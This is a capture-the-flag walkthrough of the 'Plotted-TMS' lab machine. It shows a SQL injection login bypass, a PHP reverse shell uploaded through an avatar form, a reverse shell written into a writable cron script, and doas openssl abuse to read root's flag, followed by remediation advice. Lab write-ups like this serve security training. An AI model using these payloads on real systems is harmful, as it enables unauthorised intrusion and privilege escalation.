Target IP: plotted-tms.thm (Requires /etc/hosts entry, or IP directly) Difficulty: Easy Objective: User (plot_admin) & Root (root.txt)

1. Executive Summary

“Plotted-TMS” is a Linux machine hosting a Traffic Management System (TMS). Initial access is gained by discovering a hidden management portal on port 445 (usually reserved for SMB) and bypassing the login using SQL Injection. Remote Code Execution (RCE) is achieved by exploiting an Insecure File Upload vulnerability in the user profile section. Lateral movement exploits a writable cron job script (backup.sh) to gain access as the user plot_admin. Root privilege escalation is achieved by abusing the doas configuration for openssl to read the root flag or spawn a root shell.

Key TTPs (MITRE ATT&CK):

  • T1595 (Active Scanning): Nmap port scanning revealing non-standard ports.
  • T1190 (Exploit Public-Facing App): SQL Injection (Authentication Bypass) and File Upload RCE.
  • T1053 (Scheduled Task/Job): Exploiting a writable cron job script.
  • T1548.003 (Sudo and Sudo Caching): Exploiting doas capabilities (GTFOBins).

2. Enumeration

A. Network Scanning

Nmap reveals a very unusual configuration:

  • 80/tcp (HTTP): Apache Default Page.
  • 445/tcp (HTTP): Apache Default Page (Normally SMB, but here it’s a Web Server).

B. Web Enumeration

  1. Port 80: Standard Apache default page.
  2. Port 445: Also displays the default page.
  • Directory Fuzzing: Using gobuster or feroxbuster on port 445 reveals the /management directory.
  • Application: Accessing http://<IP>:445/management loads the Traffic Management System login page.

3. Initial Access: SQL Injection & File Upload

A. Authentication Bypass (SQLi)

The login form is vulnerable to simple SQL Injection.

  • Username: admin'-- - (or admin' #)
  • Password: anything
  • Result: Successfully logged in as Administrator.

B. Remote Code Execution (RCE)

Once logged in, navigating to the “My Account” or “Profile” section reveals an image upload feature (for the user avatar).

  1. Vulnerability: The application does not properly validate the file extension or content.
  2. Payload: Create a PHP reverse shell (e.g., PentestMonkey).
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.YOUR.IP/4444 0>&1'"); ?>
  1. Upload: Upload shell.php.
  2. Execute: The application typically stores uploads in /uploads or /images. You can find the path by right-clicking the broken image icon or inspecting the source.
  • Trigger: curl http://<IP>:445/management/uploads/shell.php
  1. Listener: Catch the shell with nc -lvnp 4444.

Status: Shell as www-data.


4. Lateral Movement: The Backup Script

A. Enumeration

We enumerate the file system and running processes.

  • Cron Jobs: Listing /etc/crontab or checking /var/spool/cron (if accessible) often reveals scheduled tasks.
  • Finding: There is a script named backup.sh (often in /var/www/html/management/admin/ or /usr/local/bin/) that is executed periodically by the user plot_admin.

B. The Vulnerability

We check the permissions of backup.sh.

ls -l /path/to/backup.sh
# -rwxrwxrwx 1 plot_admin plot_admin ... backup.sh

Critical Flaw: The script is writable by www-data (or world-writable).

C. The Exploit

We overwrite the script with a reverse shell payload.

echo "bash -i >& /dev/tcp/10.10.YOUR.IP/5555 0>&1" > backup.sh

Execution:

  1. Start listener: nc -lvnp 5555.
  2. Wait for the cron job to run (usually every minute).
  3. Result: Shell as plot_admin.

User Flag: /home/plot_admin/user.txt.


5. Privilege Escalation: Doas OpenSSL

A. Enumeration

We check for sudo privileges, but sudo -l might be empty or restricted. Instead, we check for doas (a lightweight sudo alternative often found on BSD systems but sometimes installed on Linux).

find / -name "doas.conf" 2>/dev/null
# or
cat /etc/doas.conf

Output:

permit nopass plot_admin as root cmd openssl
  • Analysis: The user plot_admin can run the openssl command as root without a password.

B. The Exploit (GTFOBins)

openssl is mostly used for certificates, but it can read/write files and execute commands via external engines. However, the simplest way to read the root flag is to use its file reading capability (acting like cat).

Command:

doas openssl enc -in /root/root.txt
  • enc: Encoding command (default acts as cat if no cipher given or just outputs content).
  • -in: Input file.

Result: The content of root.txt is printed to the screen.

(Note: To get a full shell, you could try generating a malicious shared object and loading it, or reading /etc/shadow to crack the root password).


6. Remediation (Blue Team)

  1. Input Validation:
  • SQLi: Use Prepared Statements (Parameterized Queries) for all database interactions.
  • File Upload: Implement strict allow-listing for file extensions (.jpg, .png only) and disable script execution in the upload directory.
  1. Cron Job Permissions:
  • Scripts executed by specific users (especially root or admins) must not be writable by lower-privileged users (www-data).
  • Fix: chown plot_admin:plot_admin backup.sh and chmod 700 backup.sh.
  1. Least Privilege (Doas):
  • Avoid granting nopass access to binaries like openssl, tar, zip, etc., which allow arbitrary file reads/writes.
  • If openssl is needed, restrict the arguments it can take or wrap it in a secure script.